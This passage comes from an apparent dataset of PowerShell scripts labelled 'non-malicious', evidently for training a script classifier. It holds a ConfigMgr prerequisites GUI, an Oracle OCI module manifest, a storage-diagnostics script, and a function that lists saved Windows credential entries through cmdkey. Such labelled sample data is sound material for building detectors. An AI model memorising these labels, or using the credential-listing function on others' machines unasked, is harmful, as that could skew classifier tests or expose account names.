New-Object System.Windows.Forms.Padding('0') $TabControlSMC = New-Object System.Windows.Forms.TabControl $TabControlSMC.Location = New-Object System.Drawing.Size(0,0) $TabControlSMC.Size = New-Object System.Drawing.Size(800,500) $TabControlSMC.Anchor = "Top, Bottom, Left, Right" $TabControlSMC.Name = "TabControl" $TabControlSMC.SelectedIndex = 0 $TabControlSMC.Add_Selected([System.Windows.Forms.TabControlEventHandler]{ if ($TabControlSMC.SelectedTab.Name -like "Group") { if ($OutputBox.Location.Y -eq 10) { $OutputBox.Location = New-Object System.Drawing.Size(380,65) $OutputBox.Size = New-Object System.Drawing.Size(393,296) } $TabPageSMCGroup.Controls.Add($OutputBox) } }) $TabControlSMC.Add_Selected([System.Windows.Forms.TabControlEventHandler]{ if ($TabControlSMC.SelectedTab.Name -like "Computer") { if ($OutputBox.ControlAdded) { $TabPageSMCGroup.Controls.Remove($OutputBox) } $OutputBox.Location = New-Object System.Drawing.Size(10,10) $OutputBox.Size = New-Object System.Drawing.Size(763,350) $TabPageSMCComputer.Controls.Add($OutputBox) } }) $ProgressBar = New-Object System.Windows.Forms.ProgressBar $ProgressBar.Location = New-Object System.Drawing.Size(10,375) $ProgressBar.Size = New-Object System.Drawing.Size(763,30) $ProgressBar.Step = 1 $ProgressBar.Value = 0 $OutputBox = New-Object System.Windows.Forms.RichTextBox $OutputBox.Location = New-Object System.Drawing.Size(10,10) $OutputBox.Size = New-Object System.Drawing.Size(763,350) $OutputBox.Font = "Courier New" $OutputBox.BackColor = "white" $OutputBox.ReadOnly = $true $OutputBox.MultiLine = $True $DGVSMCGroup = New-Object System.Windows.Forms.DataGridView $DGVSMCGroup.Location = New-Object System.Drawing.Size(10,65) $DGVSMCGroup.Size = New-Object System.Drawing.Size(360,295) $DGVSMCGroup.ColumnCount = 1 $DGVSMCGroup.ColumnHeadersVisible = $true $DGVSMCGroup.Columns[0].Name = "Active Directory group" $DGVSMCGroup.AllowUserToAddRows = $false $DGVSMCGroup.AllowUserToDeleteRows = $false $DGVSMCGroup.ReadOnly = $True $DGVSMCGroup.ColumnHeadersHeightSizeMode = "DisableResizing" $DGVSMCGroup.AutoSizeColumnsMode = "Fill" $DGVSMCGroup.RowHeadersWidthSizeMode = "DisableResizing" $DGVSMCGroup.Add_Click({ $DGVSMCResult = $DGVSMCGroup.CurrentCell.Value $TextBoxSMCGroupResult.Text = $DGVSMCResult Write-OutputBox -OutputBoxMessage "Selected the '$($DGVSMCResult)' group" -Type "INFO: " $ButtonConfigureSystemManagementContainerGroup.Enabled = $true }) $TextBoxDC = New-Object System.Windows.Forms.TextBox $TextBoxDC.Location = New-Object System.Drawing.Size(20,428) $TextBoxDC.Size = New-Object System.Drawing.Size(170,20) $TextBoxDC.TabIndex = "0" $TextBoxSMCLocal = New-Object System.Windows.Forms.TextBox $TextBoxSMCLocal.Location = New-Object System.Drawing.Size(38,393) $TextBoxSMCLocal.Size = New-Object System.Drawing.Size(140,20) $TextBoxSMCLocal.TabIndex = "0" $TextBoxSMCLocal.Text = $env:COMPUTERNAME $TextBoxSMCLocal.Enabled = $false $TextBoxSMCRemote = New-Object System.Windows.Forms.TextBox $TextBoxSMCRemote.Location = New-Object System.Drawing.Size(218,393) $TextBoxSMCRemote.Size = New-Object System.Drawing.Size(140,20) $TextBoxSMCRemote.TabIndex = "0" $TextBoxSMCRemote.Enabled = $false $TextBoxSMCGroupSearch = New-Object System.Windows.Forms.TextBox $TextBoxSMCGroupSearch.Location = New-Object System.Drawing.Size(20,27) $TextBoxSMCGroupSearch.Size = New-Object System.Drawing.Size(340,20) $TextBoxSMCGroupSearch.TabIndex = "0" $TextBoxSMCGroupSearch.Add_KeyPress([System.Windows.Forms.KeyPressEventHandler]{ if ($_.KeyChar -eq 13) { $OutputBox.ResetText() Write-OutputBox -OutputBoxMessage "Searching Active Directory for '$($TextBoxSMCGroupSearch.Text)'" -Type "INFO: " Search-ADGroup } }) $TextBoxSMCGroupResult = New-Object System.Windows.Forms.TextBox $TextBoxSMCGroupResult.Location = New-Object System.Drawing.Size(20,392) $TextBoxSMCGroupResult.Size = New-Object System.Drawing.Size(340,20) $TextBoxSMCGroupResult.Enabled = $false $TextBoxWSUSSQLServer = New-Object System.Windows.Forms.TextBox $TextBoxWSUSSQLServer.Location = New-Object System.Drawing.Size(160,428) $TextBoxWSUSSQLServer.Size = New-Object System.Drawing.Size(140,20) $TextBoxWSUSSQLServer.TabIndex = "0" $TextBoxWSUSSQLServer.Enabled = $false $TextBoxWSUSSQLInstance = New-Object System.Windows.Forms.TextBox $TextBoxWSUSSQLInstance.Location = New-Object System.Drawing.Size(310,428) $TextBoxWSUSSQLInstance.Size = New-Object System.Drawing.Size(140,20) $TextBoxWSUSSQLInstance.TabIndex = "0" $TextBoxWSUSSQLInstance.Text = $env:COMPUTERNAME $TextBoxWSUSSQLInstance.Enabled = $false $ButtonCAS = New-Object System.Windows.Forms.Button $ButtonCAS.Location = New-Object System.Drawing.Size(60,130) $ButtonCAS.Size = New-Object System.Drawing.Size(200,80) $ButtonCAS.Text = "Central Administration Site" $ButtonCAS.TabIndex = "1" $ButtonCAS.Add_Click({Load-CAS}) $ButtonPrimarySite = New-Object System.Windows.Forms.Button $ButtonPrimarySite.Location = New-Object System.Drawing.Size(60,230) $ButtonPrimarySite.Size = New-Object System.Drawing.Size(200,80) $ButtonPrimarySite.Text = "Primary Site" $ButtonPrimarySite.TabIndex = "2" $ButtonPrimarySite.Add_Click({Load-Primary}) $ButtonSecondarySite = New-Object System.Windows.Forms.Button $ButtonSecondarySite.Location = New-Object System.Drawing.Size(60,330) $ButtonSecondarySite.Size = New-Object System.Drawing.Size(200,80) $ButtonSecondarySite.Text = "Secondary Site" $ButtonSecondarySite.TabIndex = "3" $ButtonSecondarySite.Add_Click({Load-Secondary}) $ButtonMP = New-Object System.Windows.Forms.Button $ButtonMP.Location = New-Object System.Drawing.Size(290,130) $ButtonMP.Size = New-Object System.Drawing.Size(200,50) $ButtonMP.Text = "Management Point" $ButtonMP.TabIndex = "4" $ButtonMP.Add_Click({Load-MP}) $ButtonAppCat = New-Object System.Windows.Forms.Button $ButtonAppCat.Location = New-Object System.Drawing.Size(290,200) $ButtonAppCat.Size = New-Object System.Drawing.Size(200,50) $ButtonAppCat.Text = "Application Catalog" $ButtonAppCat.TabIndex = "5" $ButtonAppCat.Add_Click({Load-AppCat}) $ButtonDP = New-Object System.Windows.Forms.Button $ButtonDP.Location = New-Object System.Drawing.Size(290,270) $ButtonDP.Size = New-Object System.Drawing.Size(200,50) $ButtonDP.Text = "Distribution Point" $ButtonDP.TabIndex = "6" $ButtonDP.Add_Click({Load-DP}) $ButtonEP = New-Object System.Windows.Forms.Button $ButtonEP.Location = New-Object System.Drawing.Size(290,340) $ButtonEP.Size = New-Object System.Drawing.Size(200,50) $ButtonEP.Text = "Enrollment Point" $ButtonEP.TabIndex = "7" $ButtonEP.Add_Click({Load-EP}) $ButtonExtendActiveDirectory = New-Object System.Windows.Forms.Button $ButtonExtendActiveDirectory.Location = New-Object System.Drawing.Size(520,130) $ButtonExtendActiveDirectory.Size = New-Object System.Drawing.Size(200,50) $ButtonExtendActiveDirectory.Text = "Extend Active Directory" $ButtonExtendActiveDirectory.TabIndex = "8" $ButtonExtendActiveDirectory.Add_Click({Load-ExtendActiveDirectory}) $ButtonWSUS = New-Object System.Windows.Forms.Button $ButtonWSUS.Location = New-Object System.Drawing.Size(520,200) $ButtonWSUS.Size = New-Object System.Drawing.Size(200,50) $ButtonWSUS.Text = "Install WSUS" $ButtonWSUS.TabIndex = "9" $ButtonWSUS.Add_Click({Load-WSUS}) $ButtonADK = New-Object System.Windows.Forms.Button $ButtonADK.Location = New-Object System.Drawing.Size(520,270) $ButtonADK.Size = New-Object System.Drawing.Size(200,50) $ButtonADK.Text = "Install ADK" $ButtonADK.TabIndex = "10" $ButtonADK.Add_Click({Load-ADK}) $ButtonSystemManagementContainer = New-Object System.Windows.Forms.Button $ButtonSystemManagementContainer.Location = New-Object System.Drawing.Size(520,340) $ButtonSystemManagementContainer.Size = New-Object System.Drawing.Size(200,50) $ButtonSystemManagementContainer.Text = "System Management Container" $ButtonSystemManagementContainer.TabIndex = "11" $ButtonSystemManagementContainer.Add_Click({Load-SystemManagementContainer}) $ButtonInstallCAS = New-Object System.Windows.Forms.Button $ButtonInstallCAS.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallCAS.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallCAS.Text = "Install" $ButtonInstallCAS.TabIndex = "1" $ButtonInstallCAS.Add_Click({Validate-CASInstall}) $ButtonInstallPrimarySite = New-Object System.Windows.Forms.Button $ButtonInstallPrimarySite.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallPrimarySite.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallPrimarySite.Text = "Install" $ButtonInstallPrimarySite.TabIndex = "1" $ButtonInstallPrimarySite.Add_Click({Validate-PrimaryInstall}) $ButtonInstallSecondarySite = New-Object System.Windows.Forms.Button $ButtonInstallSecondarySite.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallSecondarySite.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallSecondarySite.Text = "Install" $ButtonInstallSecondarySite.TabIndex = "1" $ButtonInstallSecondarySite.Add_Click({Validate-SecondaryInstall}) $ButtonInstallMP = New-Object System.Windows.Forms.Button $ButtonInstallMP.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallMP.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallMP.Text = "Install" $ButtonInstallMP.TabIndex = "1" $ButtonInstallMP.Add_Click({Validate-MPInstall}) $ButtonInstallAppCat = New-Object System.Windows.Forms.Button $ButtonInstallAppCat.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallAppCat.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallAppCat.Text = "Install" $ButtonInstallAppCat.TabIndex = "1" $ButtonInstallAppCat.Add_Click({Validate-AppCatInstall}) $ButtonInstallDP = New-Object System.Windows.Forms.Button $ButtonInstallDP.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallDP.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallDP.Text = "Install" $ButtonInstallDP.TabIndex = "1" $ButtonInstallDP.Add_Click({Validate-DPInstall}) $ButtonInstallEP = New-Object System.Windows.Forms.Button $ButtonInstallEP.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallEP.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallEP.Text = "Install" $ButtonInstallEP.TabIndex = "1" $ButtonInstallEP.Add_Click({Validate-EPInstall}) $ButtonInstallExtendAD = New-Object System.Windows.Forms.Button $ButtonInstallExtendAD.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallExtendAD.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallExtendAD.Text = "Extend" $ButtonInstallExtendAD.TabIndex = "1" $ButtonInstallExtendAD.Add_Click({Extend-ActiveDirectorySchema}) $ButtonConnectDC = New-Object System.Windows.Forms.Button $ButtonConnectDC.Location = New-Object System.Drawing.Size(673,420) $ButtonConnectDC.Size = New-Object System.Drawing.Size(100,30) $ButtonConnectDC.Text = "Connect" $ButtonConnectDC.TabIndex = "1" $ButtonConnectDC.Add_Click({Validate-ExtendActiveDirectory}) $ButtonInstallWSUS = New-Object System.Windows.Forms.Button $ButtonInstallWSUS.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallWSUS.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallWSUS.Text = "Install" $ButtonInstallWSUS.TabIndex = "1" $ButtonInstallWSUS.Add_Click({Validate-WSUS}) $ButtonInstallADK= New-Object System.Windows.Forms.Button $ButtonInstallADK.Location = New-Object System.Drawing.Size(673,420) $ButtonInstallADK.Size = New-Object System.Drawing.Size(100,30) $ButtonInstallADK.Text = "Install" $ButtonInstallADK.TabIndex = "1" $ButtonInstallADK.Add_Click({Validate-ADK}) $ButtonConfigureSystemManagementContainerComputer = New-Object System.Windows.Forms.Button $ButtonConfigureSystemManagementContainerComputer.Location = New-Object System.Drawing.Size(673,385) $ButtonConfigureSystemManagementContainerComputer.Size = New-Object System.Drawing.Size(100,30) $ButtonConfigureSystemManagementContainerComputer.Text = "Configure" $ButtonConfigureSystemManagementContainerComputer.TabIndex = "1" $ButtonConfigureSystemManagementContainerComputer.Add_Click({Validate-SystemManagementContainerComputer}) $ButtonConfigureSystemManagementContainerGroup = New-Object System.Windows.Forms.Button $ButtonConfigureSystemManagementContainerGroup.Location = New-Object System.Drawing.Size(673,385) $ButtonConfigureSystemManagementContainerGroup.Size = New-Object System.Drawing.Size(100,30) $ButtonConfigureSystemManagementContainerGroup.Text = "Configure" $ButtonConfigureSystemManagementContainerGroup.TabIndex = "1" $ButtonConfigureSystemManagementContainerGroup.Add_Click({Validate-SystemManagementContainerGroup}) $ButtonSystemManagementContainerGroupSearch = New-Object System.Windows.Forms.Button $ButtonSystemManagementContainerGroupSearch.Location = New-Object System.Drawing.Size(380,20) $ButtonSystemManagementContainerGroupSearch.Size = New-Object System.Drawing.Size(100,30) $ButtonSystemManagementContainerGroupSearch.Text = "Search" $ButtonSystemManagementContainerGroupSearch.TabIndex = "1" $ButtonSystemManagementContainerGroupSearch.Add_Click({ $OutputBox.ResetText() Write-OutputBox -OutputBoxMessage "Searching Active Directory for '$($TextBoxSMCGroupSearch.Text)'" -Type "INFO: " Search-ADGroup }) $ButtonContinue = New-Object System.Windows.Forms.Button $ButtonContinue.Location = New-Object System.Drawing.Size(673,420) $ButtonContinue.Size = New-Object System.Drawing.Size(100,30) $ButtonContinue.Text = "Continue" $ButtonContinue.TabIndex = "1" $ButtonContinue.Add_Click({Get-PrereqFiles}) $ButtonBack = New-Object System.Windows.Forms.Button $ButtonBack.Location = New-Object System.Drawing.Size(563,420) $ButtonBack.Size = New-Object System.Drawing.Size(100,30) $ButtonBack.Text = "Back" $ButtonBack.TabIndex = "2" $ButtonBack.Add_Click({Load-Start}) $ButtonBackGroup = New-Object System.Windows.Forms.Button $ButtonBackGroup.Location = New-Object System.Drawing.Size(563,385) $ButtonBackGroup.Size = New-Object System.Drawing.Size(100,30) $ButtonBackGroup.Text = "Back" $ButtonBackGroup.TabIndex = "2" $ButtonBackGroup.Add_Click({Load-Start}) $ButtonFinish = New-Object System.Windows.Forms.Button $ButtonFinish.Location = New-Object System.Drawing.Size(673,420) $ButtonFinish.Size = New-Object System.Drawing.Size(100,30) $ButtonFinish.Text = "Finish" $ButtonFinish.TabIndex = "1" $ButtonFinish.Add_Click({$Form.Close()}) $WaterMarkDC = "Enter Schema Master server name" $TextBoxDC.ForeColor = "LightGray" $TextBoxDC.Text = $WaterMarkDC $TextBoxDC.add_Enter({Enter-WaterMark -InputObject $TextBoxDC -Text $WaterMarkDC}) $TextBoxDC.add_Leave({Leave-WaterMark -InputObject $TextBoxDC -Text $WaterMarkDC}) $WaterMarkWSUSSQLServer = "Enter SQL Server name" $TextBoxWSUSSQLServer.ForeColor = "LightGray" $TextBoxWSUSSQLServer.Text = $WaterMarkWSUSSQLServer $TextBoxWSUSSQLServer.add_Enter({Enter-WaterMark -InputObject $TextBoxWSUSSQLServer -Text $WaterMarkWSUSSQLServer}) $TextBoxWSUSSQLServer.add_Leave({Leave-WaterMark -InputObject $TextBoxWSUSSQLServer -Text $WaterMarkWSUSSQLServer}) $WaterMarkWSUSSQLInstance = "Enter SQL Server instance" $TextBoxWSUSSQLInstance.ForeColor = "LightGray" $TextBoxWSUSSQLInstance.Text = $WaterMarkWSUSSQLInstance $TextBoxWSUSSQLInstance.add_Enter({Enter-WaterMark -InputObject $TextBoxWSUSSQLInstance -Text $WaterMarkWSUSSQLInstance}) $TextBoxWSUSSQLInstance.add_Leave({Leave-WaterMark -InputObject $TextBoxWSUSSQLInstance -Text $WaterMarkWSUSSQLInstance}) $LabelHeader = New-Object System.Windows.Forms.Label $LabelHeader.Location = New-Object System.Drawing.Size(180,20) $LabelHeader.Size = New-Object System.Drawing.Size(600,30) $LabelHeader.Text = "Install ConfigMgr 2012 R2 Prerequisites" $LabelHeader.Font = New-Object System.Drawing.Font("Verdana",14,[System.Drawing.FontStyle]::Bold) $LabelSMCCreate = New-Object System.Windows.Forms.Label $LabelSMCCreate.Location = New-Object System.Drawing.Size(418,395) $LabelSMCCreate.Size = New-Object System.Drawing.Size(150,20) $LabelSMCCreate.Text = "Create the container" $OpenLink = {[System.Diagnostics.Process]::Start("http://www.scconfigmgr.com")} $BlogLink = New-Object System.Windows.Forms.LinkLabel $BlogLink.Location = New-Object System.Drawing.Size(330,50) $BlogLink.Size = New-Object System.Drawing.Size(150,25) $BlogLink.Text = "www.scconfigmgr.com" $BlogLink.Add_Click($OpenLink) $RadioButtonOnline = New-Object System.Windows.Forms.RadioButton $RadioButtonOnline.Location = New-Object System.Drawing.Size(20,427) $RadioButtonOnline.Size = New-Object System.Drawing.Size(60,24) $RadioButtonOnline.Text = "Online" $RadioButtonOffline = New-Object System.Windows.Forms.RadioButton $RadioButtonOffline.Location = New-Object System.Drawing.Size(90,427) $RadioButtonOffline.Size = New-Object System.Drawing.Size(60,24) $RadioButtonOffline.Text = "Offline" $RadioButtonSMCLocal = New-Object System.Windows.Forms.RadioButton $RadioButtonSMCLocal.Location = New-Object System.Drawing.Size(20,392) $RadioButtonSMCLocal.Size = New-Object System.Drawing.Size(15,24) $RadioButtonSMCLocal.Add_Click({$TextBoxSMCRemote.Enabled = $false}) $RadioButtonSMCRemote = New-Object System.Windows.Forms.RadioButton $RadioButtonSMCRemote.Location = New-Object System.Drawing.Size(200,392) $RadioButtonSMCRemote.Size = New-Object System.Drawing.Size(15,24) $RadioButtonSMCRemote.Add_Click({$TextBoxSMCRemote.Enabled = $true}) $RadioButtonEP = New-Object System.Windows.Forms.RadioButton $RadioButtonEP.Location = New-Object System.Drawing.Size(20,427) $RadioButtonEP.Size = New-Object System.Drawing.Size(110,20) $RadioButtonEP.Text = "Enrollment Point" $RadioButtonEPP = New-Object System.Windows.Forms.RadioButton $RadioButtonEPP.Location = New-Object System.Drawing.Size(160,427) $RadioButtonEPP.Size = New-Object System.Drawing.Size(137,20) $RadioButtonEPP.Text = "Enrollment Proxy Point" $RadioButtonWID = New-Object System.Windows.Forms.RadioButton $RadioButtonWID.Location = New-Object System.Drawing.Size(20,427) $RadioButtonWID.Size = New-Object System.Drawing.Size(60,24) $RadioButtonWID.Text = "WID" $RadioButtonWID.Checked = $true $RadioButtonWID.Add_Click({ $TextBoxWSUSSQLServer.Enabled = $false $TextBoxWSUSSQLInstance.Enabled = $false $OutputBox.Clear() }) $RadioButtonSQL = New-Object System.Windows.Forms.RadioButton $RadioButtonSQL.Location = New-Object System.Drawing.Size(90,427) $RadioButtonSQL.Size = New-Object System.Drawing.Size(45,24) $RadioButtonSQL.Text = "SQL" $RadioButtonSQL.Add_Click({ $TextBoxWSUSSQLServer.Enabled = $true $TextBoxWSUSSQLInstance.Enabled = $true Write-OutputBox -OutputBoxMessage "Specify the SQL Server computer name and instance name in the fields below" -Type "INFO: " Write-OutputBox -OutputBoxMessage "Leave the instance field empty if you're using the default instance on the SQL Server" -Type "INFO: " }) $CBSMCCreate = New-Object System.Windows.Forms.CheckBox $CBSMCCreate.Location = New-Object System.Drawing.Size(400,392) $CBSMCCreate.Size = New-Object System.Drawing.Size(20,20) $GBSites = New-Object System.Windows.Forms.GroupBox $GBSites.Location = New-Object System.Drawing.Size(50,100) $GBSites.Size = New-Object System.Drawing.Size(220,340) $GBSites.Text = "Sites" $GBSiteSystemRoles = New-Object System.Windows.Forms.GroupBox $GBSiteSystemRoles.Location = New-Object System.Drawing.Size(280,100) $GBSiteSystemRoles.Size = New-Object System.Drawing.Size(220,340) $GBSiteSystemRoles.Text = "Site System Roles" $GBOther = New-Object System.Windows.Forms.GroupBox $GBOther.Location = New-Object System.Drawing.Size(510,100) $GBOther.Size = New-Object System.Drawing.Size(220,340) $GBOther.Text = "Other" $GBADK = New-Object System.Windows.Forms.GroupBox $GBADK.Location = New-Object System.Drawing.Size(10,410) $GBADK.Size = New-Object System.Drawing.Size(190,45) $GBADK.Text = "Installation methods" $GBWSUS = New-Object System.Windows.Forms.GroupBox $GBWSUS.Location = New-Object System.Drawing.Size(10,410) $GBWSUS.Size = New-Object System.Drawing.Size(130,45) $GBWSUS.Text = "Database options" $GBWSUSSQL = New-Object System.Windows.Forms.GroupBox $GBWSUSSQL.Location = New-Object System.Drawing.Size(150,410) $GBWSUSSQL.Size = New-Object System.Drawing.Size(310,45) $GBWSUSSQL.Text = "SQL Server details" $GBExtendAD = New-Object System.Windows.Forms.GroupBox $GBExtendAD.Location = New-Object System.Drawing.Size(10,410) $GBExtendAD.Size = New-Object System.Drawing.Size(190,45) $GBExtendAD.Text = "Schema Master server name" $GBSystemManagementContainer = New-Object System.Windows.Forms.GroupBox $GBSystemManagementContainer.Location = New-Object System.Drawing.Size(10,375) $GBSystemManagementContainer.Size = New-Object System.Drawing.Size(360,45) $GBSystemManagementContainer.Text = "Add computer account to the System Management container" $GBSystemManagementContainerGroup = New-Object System.Windows.Forms.GroupBox $GBSystemManagementContainerGroup.Location = New-Object System.Drawing.Size(10,375) $GBSystemManagementContainerGroup.Size = New-Object System.Drawing.Size(360,45) $GBSystemManagementContainerGroup.Text = "AD group that will be added to the System Management container" $GBSystemManagementContainerGroupSearch = New-Object System.Windows.Forms.GroupBox $GBSystemManagementContainerGroupSearch.Location = New-Object System.Drawing.Size(10,10) $GBSystemManagementContainerGroupSearch.Size = New-Object System.Drawing.Size(360,45) $GBSystemManagementContainerGroupSearch.Text = "Search for an AD group to add to the System Management Container" $GBEP = New-Object System.Windows.Forms.GroupBox $GBEP.Location = New-Object System.Drawing.Size(10,410) $GBEP.Size = New-Object System.Drawing.Size(290,45) $GBEP.Text = "Select a site system role" Validate-OS
combined_dataset/train/non-malicious/sample_58_66.ps1
sample_58_66.ps1
# # Module manifest for module 'OCI.PSModules.Loggingingestion' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Loggingingestion.dll' # Version number of this module. ModuleVersion = '86.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'ed6ebc41-8c84-4a4f-aaec-c687cb3245b5' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Loggingingestion Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Loggingingestion.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Write-OCILoggingingestionLogs' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Loggingingestion' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/1581.ps1
1581.ps1
function Get-MrSavedCredential { [CmdletBinding()] param ( [ValidateScript({ If ($_ -notmatch '^\/') { $True } else { Throw "$_ is not valid. Target cannot begin with a forward slash." } })] [string]$Target ) $data = & "$env:windir\System32\cmdkey.exe" /list $Target | Select-String -Pattern '^\s+\S' for ($i=0;$i -lt $data.count;$i+=4) { [pscustomobject] @{ Target = $data[$i] -replace '^.*=|^.*:\s|\s*$' Type = $data[$i+1] -replace '^.*:\s|\s*$' User = $data[$i+2] -replace '^.*:\s|\s*$' Persistence = $data[$i+3] -replace '^\s*|\s\S*$' } } }
combined_dataset/train/non-malicious/sample_11_65.ps1
sample_11_65.ps1
#region 'Old Code' <# if ($OSVersion.Major -eq 5) { # Disabling running on Win2K3 x64 due some reports of crashes for specific controllers "[San.exe] - Skipping running san.exe on Windows prior to Server 2008" | WriteTo-StdOut } else { Import-LocalizedData -BindingVariable SanStorageInfoStrings Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning $fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput $sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc $OutputFile = $ComputerName + "_Storage_Information.txt" $CommandToExecute = "cmd.exe /c SAN.exe $CommandToAdd" RunCmD -commandToRun $CommandToExecute -sectionDescription $sectionDescription -filesToCollect $OutputFile -fileDescription $fileDescription } #> #endregion <# COLLECTING FOLLOWING INFORMATION: ---------------------------------------------- Important registry entries related to storage. Trim support Thin provisioning ODX support Device drivers and settings (if appropriate) DSM settings SCSI registry information SCSI inquiry information SCSI reservation information Tape Devices Tape Changers VDS information MPIO information Disk failure prediction information iSCSI connection information NTFS information #> Import-LocalizedData -BindingVariable SanStorageInfoStrings Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning $fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput $sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc $OutputFile = ("{0}_StorageInfo.LOG" -f $env:COMPUTERNAME) $temp = (Get-CimInstance -Class Win32_OperatingSystem).Version.Split('.') [Float]$OSVersion = [Float]("$($temp[0]).$($temp[1])") if([Float]$OSVersion -lt [Float](6.0)) { # Skipping collecting storage info on Windows prior to Server 2008. return } # ============================================= # # Generic Info # ============================================= # "`n" | Out-File -FilePath $OutputFile -Append $os = Get-CimInstance Win32_OperatingSystem "{0, -17}: {1} (Build {2}) [{3}]" -f 'Operating System', ($os.Caption), ($os.BuildNumber), ($os.OSArchitecture) | Out-File -FilePath $OutputFile -Append "{0, -17}: {1}" -f 'Processor', ((Get-CimInstance Win32_Processor).Name) | Out-File -FilePath $OutputFile -Append "{0, -17}: {1}" -f 'Log Time', (Get-Date -Format 'HH:mm:ss yyyy/MM/dd') | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append # ============================================= # # VDS Alignment # ============================================= # $regKeyVDSAlignment = 'HKLM:\SYSTEM\ControlSet001\Services\vds\Alignment' if(Test-Path ($regKeyVDSAlignment)) { '=============================================' | Out-File -FilePath $OutputFile -Append 'VDS Alignment' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'INFO: Alignment Settings in Bytes' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Between4_8GB', 'Between8_32GB', 'GreaterThan32GB', 'LessThan4GB' | ForEach-Object { "{0,-16}: {1}" -f $_, ((Get-ItemProperty -Path $regKeyVDSAlignment -Name $_ -ErrorAction SilentlyContinue)."$_") | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append } # ============================================= # # SAN Policy # ============================================= # Add-Type -TypeDefinition @" public enum SANPolicy { VDS_SP_UNKNOWN = 0x0, VDS_SP_ONLINE = 0x1, VDS_SP_OFFLINE_SHARED = 0x2, VDS_SP_OFFLINE = 0x3 } "@ $sanPolicyDescriptions = @{ 'VDS_SP_UNKNOWN' = 'The SAN policy is unknown.'; 'VDS_SP_ONLINE' = 'All newly discovered disks are brought online and made read-write.'; 'VDS_SP_OFFLINE_SHARED' = 'All newly discovered disks that do not reside on a shared bus are brought online and made read-write.'; 'VDS_SP_OFFLINE' = 'All 